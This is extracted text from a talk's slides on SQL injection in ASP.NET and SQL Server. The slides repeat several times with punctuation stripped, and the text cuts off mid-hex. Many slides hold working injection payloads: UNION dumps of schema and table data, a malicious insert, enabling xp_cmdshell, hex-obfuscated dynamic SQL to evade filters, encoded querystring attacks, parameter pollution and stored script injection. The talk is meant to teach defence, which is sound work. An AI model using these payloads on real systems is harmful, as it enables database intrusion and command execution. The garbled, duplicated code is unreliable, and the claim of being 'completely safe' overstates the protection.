bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap: What To Do
• Parameterize your queries
 – Use SqlParameter to handle input in ASP.NET
 – Use sp_executesql correctly when you do use dynamic SQL: the value goes in the parameter list, never into the string
• Understand your data domain
 – Correct data sizes (not too large)
 – Input field has correct length
 – Regular expressions for well-defined field types (e.g. phone number, Social Security Number)
 – Blacklists usually don't work, but whitelists can
• Create limited-access accounts for web applications
• Constraints in UI, business objects and database
 – Defense in depth
 – This isn't really a violation of DRY: if I can beat two of your three checks, the third could still stop me
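The "limited-access accounts for web applications" point in the recap, as an added T-SQL example that is not part of the talk. It creates a login that can run the application's procedures and read the one table they query, then replays the demos' payloads as that user. The login, user, role and password are made up here (the password is a placeholder, not a real secret); AdventureWorks is the sample database the talk uses.

```sql
-- Added example, not code from the talk: a least-privilege account for the web
-- application, and what the slides' attacks turn into when run through it.
-- Login, user, role and password are made up for this example.
USE master;
GO
CREATE LOGIN WebAppLogin
    WITH PASSWORD = N'Replace-With-A-Generated-Secret-1!',   -- placeholder, not a real secret
         CHECK_POLICY = ON;
GO

USE AdventureWorks;
GO
CREATE USER WebAppUser FOR LOGIN WebAppLogin;
CREATE ROLE WebAppRole;
ALTER ROLE WebAppRole ADD MEMBER WebAppUser;   -- EXEC sp_addrolemember on SQL Server 2008 R2 and earlier

-- No db_owner, no db_datareader/db_datawriter. The app may run the procedures
-- in its schema and read the one table they query, nothing else.
GRANT EXECUTE ON SCHEMA::dbo TO WebAppRole;
-- SELECT is granted explicitly because dynamic SQL (sp_executesql) inside a
-- procedure runs as the caller: ownership chaining does not cover it.
GRANT SELECT ON OBJECT::Production.ProductSubcategory TO WebAppRole;
GO

-- Replay the slides' payloads as that user. Every statement that fails here is
-- one an attacker could no longer run even through an injection hole.
-- Run them one at a time to see each error on its own.
EXECUTE AS USER = N'WebAppUser';

SELECT Name FROM Production.ProductSubcategory WHERE Name LIKE N'Mountain%';   -- works: granted

SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;   -- lists only objects this user has a permission on, not the whole catalog

INSERT INTO Production.ProductSubcategory (ProductCategoryID, Name, rowguid, ModifiedDate)
VALUES (1, N'Evil Hacker Subcategory', NEWID(), CURRENT_TIMESTAMP);   -- fails: INSERT permission denied

SELECT TOP (1) * FROM HumanResources.EmployeePayHistory;   -- fails: SELECT permission denied

EXEC sp_configure 'show advanced options', 1;   -- fails: needs ALTER SETTINGS
EXEC xp_cmdshell 'whoami';                      -- fails: EXECUTE permission denied on xp_cmdshell

REVERT;
GO
```

The account does not stop the injection itself; that is what the parameters are for. It bounds what a successful injection can do: schema recon shrinks to the objects the app already touches, the insert and the xp_cmdshell escalation from the demo are refused outright, and the app's connection string carries a login that cannot be turned into a sysadmin.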
Next Steps
• Automation
 – Havij (most popular, easy GUI)
 – sqlmap (my favorite)
 – BSQL Hacker (blind SQL injection)
 – BBQSQL (Python-based blind SQL injection)
 – Fast-Track (Metasploit module)
 – Plenty more where this came from
• Really evil stuff
Q&A
Kevin Feasel, feaselkl@gmail.com
Why Should I Care
bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had
become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2
bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main
bull Imperva (2011) 83 of successful data breaches involve SQLi
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
